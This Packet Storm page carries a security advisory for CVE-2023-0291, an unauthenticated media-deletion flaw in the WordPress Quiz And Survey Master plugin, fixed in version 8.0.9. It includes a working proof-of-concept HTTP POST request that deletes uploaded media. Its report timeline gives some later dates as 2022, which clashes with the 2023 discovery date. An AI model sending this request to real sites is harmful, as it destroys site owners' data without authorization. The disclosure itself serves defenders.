exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Quiz And Survey Master 8.0.8 Media Deletion

WordPress Quiz And Survey Master 8.0.8 Media Deletion
Posted Feb 15, 2023
Authored by Julien Ahrens | Site rcesecurity.com

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a missing authentication vulnerability that allows an attacker to delete media from the WordPress instance.

tags | exploit
advisories | CVE-2023-0291
SHA-256 | 45afa719cdeb338f8d0beb9b6c68e717ebfe472417ebe348bbc34459b0250c7c

WordPress Quiz And Survey Master 8.0.8 Media Deletion

Change Mirror Download
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: Quiz And Survey Master
Vendor URL: https://wordpress.org/plugins/quiz-master-next/
Type: Missing Authentication for Critical Function [CWE-306]
Date found: 2023-01-13
Date published: 2023-02-08
CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
CVE: CVE-2023-0291


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Quiz And Survey Master 8.0.8 and below


4. INTRODUCTION
===============
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used
to create engaging content to drive traffic and increase user engagement.
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated
users which accepts a "media_id" parameter pointing to a any item uploaded through
WordPress' media upload functionality. However, this "media_id" is afterward used
in a forced wp_delete_attachment() call ultimately deleteing the media from the
WordPress instance.

Successful exploits can allow an unauthenticated attacker to delete any (and all)
uploaded WordPress media files.


6. PROOF OF CONCEPT
===================
The following Proof-of-Concept would delete the uploaded media with the ID "1":

POST /wp-admin/admin-ajax.php HTTP/2
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1


7. SOLUTION
===========
Update to version 8.0.9


8. REPORT TIMELINE
==================
2023-01-13: Discovery of the vulnerability
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291
2023-01-18: Sent initial notification to vendor via contact form
2022-01-18: Vendor response
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability
2022-02-08: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories


--
Mit freundlichen Grüßen / With best regards / Atentamente

Julien Ahrens
Freelancer | Penetration Tester

RCE Security
VAT-ID: DE328576638
Website: www.rcesecurity.com


This e-mail may contain confidential and/or privileged information.
If you are not the intended recipient (or have received this e-mail in
error) please notify the sender immediately and destroy this e-mail.
Any unauthorized copying, disclosure or distribution of the material
in this e-mail is strictly forbidden.

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close